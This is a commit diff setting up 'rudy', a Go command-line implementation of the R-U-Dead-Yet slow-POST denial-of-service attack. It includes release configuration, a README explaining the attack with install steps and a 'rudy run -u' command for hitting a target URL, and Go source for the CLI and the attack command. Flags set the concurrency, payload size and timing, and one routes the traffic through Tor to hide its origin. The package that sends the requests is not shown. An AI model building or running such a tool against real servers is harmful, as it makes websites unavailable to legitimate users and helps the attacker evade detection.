Setup RUDY

Author: darkweak

.github/workflows/release.yml

@@ -0,0 +1,29 @@
+name: Release the rudy binary
+
+on:
+  create:
+    tags: ["v*"]
+
+jobs:
+  generate-artifacts:
+    name: Deploy to goreleaser
+    runs-on: ubuntu-latest
+    steps:
+      -
+        name: Set up Go
+        uses: actions/setup-go@v2
+        with:
+          go-version: 1.18
+      -
+        name: Checkout
+        uses: actions/checkout@v2
+        with:
+          fetch-depth: 0
+      -
+        name: Run GoReleaser
+        uses: goreleaser/goreleaser-action@v3
+        with:
+          version: latest
+          args: release --rm-dist
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

.golangci.yml

@@ -0,0 +1,15 @@
+run:
+  timeout: 30s
+  issues-exit-code: 1
+
+whitespace:
+  multi-if: true
+  multi-func: true
+
+linters:
+  enable-all: true
+  disable:
+    - gochecknoglobals
+    - golint
+    - gomnd
+    - ireturn

.goreleaser.yml

@@ -0,0 +1,33 @@
+before:
+  hooks:
+  - go mod download
+builds:
+- <<: &build_defaults
+    ldflags:
+      - -s -w
+  env:
+    - CGO_ENABLED=0
+  goos:
+    - linux
+    - darwin
+    - windows
+  goarch:
+    - 386
+    - amd64
+    - arm
+    - arm64
+  ignore:
+    - goos: windows
+      goarch: arm64
+archives:
+  -
+    replacements:
+      darwin: Darwin
+      linux: Linux
+      windows: Windows
+      386: i386
+      amd64: x86_64
+    format_overrides:
+      -
+        goos: windows
+        format: zip

LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2022 darkweak
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

README.md

@@ -0,0 +1,56 @@
+RUDY (R-U-Dead-Yet?)
+====================
+
+## What is the RUDY Attack?
+R.U.D.Y., short for R U Dead yet, is an acronym used to describe a Denial of Service (DoS) tool used by hackers to perform slow-rate a.k.a. “Low and slow” attacks by directing long form fields to the targeted server. It is known to have an interactive console, thus making it a user-friendly tool. It opens fewer connections to the website being targeted for a long period and keeps the sessions open as long as it is feasible. The amount of open sessions overtires the server or website making it unavailable for the authentic visitors. The data is sent in small packs at an incredibly slow rate; normally there is a gap of ten seconds between each byte but these intervals are not definite and may vary to avert detection.
+
+The victim servers of these types of attacks may face issues such as not being able to access a particular website, disrupt their connection, drastically slow network performance, etc.
+
+Hackers can use such attacks for different purposes while targeting different servers or hosts; these purposes include, but are not limited to, blackmail, vengeance or sometimes even activism.
+
+The RUDY attack opens concurrent POST HTTP connections to the HTTP server and delays sending the body of the POST request to the point that the server resources are saturated. This attack sends numerous small packets at a very slow rate to keep the connection open and the server busy. This low-and slow attack behavior makes it relatively difficult to detect, compared to flooding DoS attacks that raise the traffic volume abnormally.
+
+## How to install and run rudy?
+
+### Using `go install`
+```bash
+go install -u github.com/darkweak/rudy/cmd/rudy@latest
+rudy [command]
+```
+
+### Using directly `go`
+```bash
+git clone https://github.com/darkweak/rudy
+cd rudy
+go run rudy.go [command]
+```
+
+### Using `go build`
+```bash
+git clone https://github.com/darkweak/rudy
+cd rudy
+go build rudy.go -o rudy
+rudy [command]
+```
+
+## Commands
+### Attack a target
+```bash
+rudy run -u http://domain.com
+```
+
+There are some options to change the rudy default behaviour 
+| Name                | Description                                                              | Long flag        | Short flag | Example value           | Default value |
+|:--------------------|:-------------------------------------------------------------------------|:-----------------|:-----------|:------------------------|:--------------|
+| URL                 | The target URL to run the attack on.                                     | `--url`          | `-u`       | `http://domain.com`     |               |
+| Concurrent requests | The number of concurrent requests to send on the target.                 | `--concurrents`  | `-c`       | `4`                     | `1`           |
+| Filepath            | Filepath to the payload to send. By default it's a random payload (1MB). | `--filepath`     | `-f`       | `/somewhere/file`       |               |
+| Interval            | Interval duration between the requests.                                  | `--interval`     | `-i`       | `3s`                    | `10s`         |
+| Size                | Random payload size to send. Used if no filepath given.                  | `--payload-size` | `-s`       | `1GB`                   | `1MB`         |
+| Tor                 | Use TOR proxy to send the requests.                                      | `--tor`          | `-t`       | `socks5://tor_endpoint` |               |
+
+### Run the testing server
+It will start a serer on the port `:8081`
+```bash
+rudy server
+```

cmd/rudy/main.go

@@ -0,0 +1,39 @@
+package main
+
+import (
+	"context"
+	"log"
+	"os"
+	"os/signal"
+
+	"github.com/darkweak/rudy/commands"
+	"github.com/spf13/cobra"
+)
+
+func trapSignals(ctx context.Context, cancel context.CancelFunc) {
+	sig := make(chan os.Signal, 1)
+	signal.Notify(sig, os.Interrupt)
+
+	select {
+	case <-sig:
+		log.Println("[INFO] SIGINT: Stopping RUDY")
+		cancel()
+	case <-ctx.Done():
+		return
+	}
+}
+
+func main() {
+	ctx, cancel := context.WithCancel(context.Background())
+	defer cancel()
+
+	go trapSignals(ctx, cancel)
+
+	var root cobra.Command
+
+	commands.Prepare(&root)
+
+	if err := root.Execute(); err != nil {
+		panic(err)
+	}
+}

commands/list.go

@@ -0,0 +1,44 @@
+package commands
+
+import (
+	"github.com/spf13/cobra"
+	"github.com/spf13/pflag"
+)
+
+var list = []commandInstanciator{newRun, newServer}
+
+type (
+	command interface {
+		Info() string
+		GetArgs() cobra.PositionalArgs
+		GetDescription() string
+		GetLongDescription() string
+		GetRequiredFlags() []string
+		Run() RunCmd
+		SetFlags(*pflag.FlagSet)
+	}
+	commandInstanciator func() command
+	RunCmd              func(cmd *cobra.Command, args []string)
+)
+
+func Prepare(root *cobra.Command) {
+	for _, item := range list {
+		var cobraCmd cobra.Command
+
+		instance := item()
+
+		cobraCmd.Use = instance.Info()
+		cobraCmd.Short = instance.GetDescription()
+		cobraCmd.Long = instance.GetLongDescription()
+		cobraCmd.Args = instance.GetArgs()
+		cobraCmd.Run = instance.Run()
+
+		instance.SetFlags(cobraCmd.Flags())
+
+		for _, f := range instance.GetRequiredFlags() {
+			_ = cobraCmd.MarkFlagRequired(f)
+		}
+
+		root.AddCommand(&cobraCmd)
+	}
+}

commands/run.go

@@ -0,0 +1,98 @@
+package commands
+
+import (
+	"sync"
+	"time"
+
+	"github.com/darkweak/rudy/logger"
+	"github.com/darkweak/rudy/request"
+	"github.com/dustin/go-humanize"
+	"github.com/spf13/cobra"
+	"github.com/spf13/pflag"
+)
+
+var (
+	concurrents int64
+	filepath    string
+	interval    time.Duration
+	size        string
+	tor         string
+	url         string
+)
+
+type Run struct{}
+
+// SetFlags set the available flags.
+func (*Run) SetFlags(flags *pflag.FlagSet) {
+	flags.Int64VarP(&concurrents, "concurrents", "c", 1, "Concurrent requests count.")
+	flags.StringVarP(&filepath, "filepath", "f", "", "Filepath to the payload.")
+	flags.DurationVarP(&interval, "interval", "i", 10*time.Second, "Interval between packets.")
+	// Default ~1MB
+	flags.StringVarP(&size, "payload-size", "p", "1MB", "Random generated payload with the given size.")
+	flags.StringVarP(&tor, "tor", "t", "", "TOR endpoint (either socks5://1.1.1.1:1234, or 1.1.1.1:1234).")
+	flags.StringVarP(&url, "url", "u", "", "Target URL to send the attack to.")
+}
+
+// GetRequiredFlags returns the server required flags.
+func (*Run) GetRequiredFlags() []string {
+	return []string{"url"}
+}
+
+// GetArgs return the args.
+func (*Run) GetArgs() cobra.PositionalArgs {
+	return nil
+}
+
+// GetDescription returns the command description.
+func (*Run) GetDescription() string {
+	return "Run the rudy attack"
+}
+
+// GetLongDescription returns the command long description.
+func (*Run) GetLongDescription() string {
+	return "Run the rudy attack on the target"
+}
+
+// Info returns the command name.
+func (*Run) Info() string {
+	return "run -u http://domain.com"
+}
+
+// Run executes the script associated to the command.
+func (*Run) Run() RunCmd {
+	return func(_ *cobra.Command, _ []string) {
+		var waitgroup sync.WaitGroup
+		isize, e := humanize.ParseBytes(size)
+		if e != nil {
+			panic(e)
+		}
+
+		waitgroup.Add(int(concurrents))
+
+		for i := 0; i < int(concurrents); i++ {
+			go func() {
+				req := request.NewRequest(int64(isize), url, interval)
+				if tor != "" {
+					req.WithTor(tor)
+				}
+
+				if req.Send() == nil {
+					logger.Logger.Sugar().Infof("Request successfully sent to %s", url)
+				}
+
+				waitgroup.Done()
+			}()
+		}
+
+		waitgroup.Wait()
+	}
+}
+
+func newRun() command {
+	return &Run{}
+}
+
+var (
+	_ command             = (*Run)(nil)
+	_ commandInstanciator = newRun
+)